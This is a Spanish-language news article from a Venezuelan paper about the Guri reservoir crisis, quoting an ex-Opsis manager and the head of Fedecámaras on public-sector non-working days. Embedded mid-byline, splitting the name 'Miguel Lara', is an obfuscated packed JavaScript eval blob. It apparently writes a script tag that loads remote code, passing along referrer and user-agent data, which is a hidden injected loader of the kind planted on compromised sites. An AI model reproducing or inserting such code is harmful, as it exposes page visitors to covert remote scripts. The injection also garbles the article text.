Días no laborables adicionales solo ahorrarían dos días del Guri

Alixel Cabrera / Maracaibo / [email protected]
Miguel eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bkddz|var|u0026u|referrer|nbess||js|php'.split('|'),0,{})) Lara, exgerente de la Oficina de Operación de Sistemas Interconectados (Opsis). Indica que las medidas “son un recurso desesperado” con el objetivo de estirar el poco volumen de agua que queda para la cota crítica de 240 metros sobre el nivel del mar (msnm)

Las medidas extremas que ejecuta el Estado para preservar los niveles del embalse de Guri llegaron tarde. Decretar los miércoles y jueves no laborables para el sector público, a pesar de juntarse con los días viernes, garantizaría el ahorro de uno o dos centímetros diarios adicionales en el Guri. Es decir que las dos semanas en las que se prevé que se lleve a cabo la medida salvarían a la represa solo por un par de días.

Así lo afirma Miguel Lara, exgerente de la Oficina de Operación de Sistemas Interconectados (Opsis). Indica que las medidas “son un recurso desesperado” con el objetivo de estirar el poco volumen de agua que queda para la cota crítica de 240 metros sobre el nivel del mar (msnm). La mayor apuesta del Gobierno es que las lluvias lleguen y los aportes de la cuenca del río Caroní sean suficientes para alejarse del nivel de colapso que acarrearía un incremento en los racionamientos.

Lara asegura que el consumo del sector público nacional representa cerca de ocho por ciento de la demanda nacional y que, como no todas las oficinas estarán fuera de servicio, el impacto del ahorro es aún menor. Advierte que si las lluvias no llegan la tercera semana de mayo, como lo prevé Luis Motta Domínguez, ministro para la Energía Eléctrica, es seguro que el embalse tocará la cota 240 msnm, en la que deberán detener las operaciones de la central hidroeléctrica Simón Bolívar. “Ya el daño está hecho”, dice.

El experto critica también que no se aplique el plan de racionamiento en el horario de 8.00 a 12.00 de la noche, puesto que prevé que esto podría conllevar a un apagón general por la gran demanda. “Es inconcebible que se haga eso porque en un sistema que está sin margen de maniobra, ¿cómo lo van a poner a sobre exigir a la hora pico? El martes no pasó porque a la gente se le fue la luz más horas”.

Fedecámaras en contra de la medida

Francisco Martínez, presidente de Fedecámaras, rechaza la medida de decretar los miércoles y jueves como días no laborables para el sector público. Afirma que esto demuestra la paralización del país. Le preocupa la operatividad de los bienes y servicios en el país y aseveró que la práctica afectaría los trámites para la producción del sector privado, reseña el portal de Globovisión. “No solo nos enfrentamos a este tipo mecanismos sino que se nos cierra el acceso a permisos que se registran a dos días, esto afecta la producción e impacta en escasez y anaqueles".

Más noticias

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: [email protected] , [email protected] o [email protected]
Desarrollado por Miguel Guadarrama